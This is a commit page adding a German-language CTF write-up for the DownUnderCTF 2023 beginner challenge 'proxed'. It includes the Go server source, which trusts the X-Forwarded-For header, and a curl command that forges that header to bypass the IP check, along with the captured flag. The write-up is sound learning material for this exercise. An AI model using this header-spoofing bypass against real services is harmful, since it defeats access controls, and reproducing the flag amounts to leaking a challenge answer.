htb updates and ductf update
This commit is contained in:
Simon Hünecke
58
DownUnderCTF 2023/beginner/proxed/README.md
Normal file
58
DownUnderCTF 2023/beginner/proxed/README.md
Normal file
@@ -0,0 +1,58 @@
|
||||
Go Source:
|
||||
|
||||
```go
|
||||
package main
|
||||
|
||||
import (
|
||||
"flag"
|
||||
"fmt"
|
||||
"log"
|
||||
"net/http"
|
||||
"os"
|
||||
"strings"
|
||||
)
|
||||
|
||||
var (
|
||||
port = flag.Int("port", 8081, "The port to listen on")
|
||||
)
|
||||
|
||||
func main() {
|
||||
|
||||
flag.Parse()
|
||||
|
||||
http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
|
||||
xff := r.Header.Values("X-Forwarded-For")
|
||||
|
||||
ip := strings.Split(r.RemoteAddr, ":")[0]
|
||||
|
||||
if xff != nil {
|
||||
ips := strings.Split(xff[len(xff)-1], ", ")
|
||||
ip = ips[len(ips)-1]
|
||||
ip = strings.TrimSpace(ip)
|
||||
}
|
||||
|
||||
if ip != "31.33.33.7" {
|
||||
message := fmt.Sprintf("untrusted IP: %s", ip)
|
||||
http.Error(w, message, http.StatusForbidden)
|
||||
return
|
||||
} else {
|
||||
w.Write([]byte(os.Getenv("FLAG")))
|
||||
}
|
||||
})
|
||||
|
||||
log.Printf("Listening on port %d", *port)
|
||||
log.Fatal(http.ListenAndServe(fmt.Sprintf(":%d", *port), nil))
|
||||
}
|
||||
|
||||
```
|
||||
|
||||
Es ist ziemlich eindeutig, dass man seine IP Adresse spoofen soll, um die Flagge aus den ENV vars zu lesen.
|
||||
|
||||
Ein hilfreicher Stack-Overflow Beitrag hilft dabei: https://stackoverflow.com/questions/5188584/how-can-i-spoof-the-sender-ip-address-using-curl
|
||||
|
||||
=> SOLVED
|
||||
```bash
|
||||
┌──(kali㉿kali)-[/ctf/DownUnderCTF 2023/beginner/static file server]
|
||||
└─$ curl --header "X-Forwarded-For: 31.33.33.7" http://proxed.duc.tf:30019/
|
||||
DUCTF{17_533m5_w3_f0rg07_70_pr0x}
|
||||
```
|
||||
Reference in New Issue
Block a user